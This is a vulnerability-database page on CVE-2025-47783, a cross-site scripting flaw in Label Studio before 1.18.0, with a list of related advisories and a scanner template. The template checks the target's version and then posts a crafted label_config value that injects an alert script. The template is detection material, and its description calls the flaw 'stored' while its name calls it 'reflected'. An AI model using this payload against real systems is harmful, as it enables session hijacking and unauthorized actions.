| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CVE-2025-47783 | 14 May 202519:34 | – | circl | |
| Label Studio 跨站脚本漏洞 | 14 May 202500:00 | – | cnnvd | |
| CVE-2025-47783 | 14 May 202523:01 | – | cve | |
| CVE-2025-47783 label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter. | 14 May 202523:01 | – | cvelist | |
| EUVD-2025-14944 | 3 Oct 202520:07 | – | euvd | |
| label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter. | 15 May 202516:21 | – | github | |
| CVE-2025-47783 | 14 May 202523:15 | – | nvd | |
| CVE-2025-47783 label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter. | 14 May 202523:01 | – | osv | |
| GHSA-8JHR-WPCM-HH4H label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter. | 15 May 202516:21 | – | osv | |
| PYSEC-2025-124 | 14 May 202523:15 | – | osv |
id: CVE-2025-47783
info:
name: Label Studio < 1.18.0 - Reflected XSS
author: 0x_Akoko
severity: medium
description: |
Label Studio < 1.18.0 contains a stored XSS caused by improper sanitization in POST /projects/upload-example/ endpoint, letting attackers inject malicious scripts to hijack sessions and perform unauthorized actions, exploit requires sending crafted requests.
impact: |
Attackers can hijack user sessions, steal data, and perform unauthorized actions via injected scripts.
remediation: |
Upgrade to version 1.18.0 or later.
reference:
- https://github.com/HumanSignal/label-studio/security/advisories/GHSA-8jhr-wpcm-hh4h
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: humansignal
product: label-studio
shodan-query: title:"Label Studio"
fofa-query: title="Label Studio"
tags: label-studio,xss,reflected
flow: http(1) && http(2)
http:
- raw:
- |
GET /version HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "label-studio")'
- 'compare_versions(lsversion, "< 1.18.0")'
condition: and
internal: true
extractors:
- type: regex
name: lsversion
part: body
regex:
- '"release":\s*"([0-9]+\.[0-9]+(?:\.[0-9]+)?)'
group: 1
internal: true
- raw:
- |
POST /projects/upload-example/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22%24textjmwwi%26lt%3bscript%26gt%3balert(document.domain)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022059e7488726a01078b95911794f3531c6dc025cdeee18ef73cfd45eee1fd780620221008d944d3b2f8b2027595e8fad74c7c9c05ad0868d4bf92497c6e4424914e817cc:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation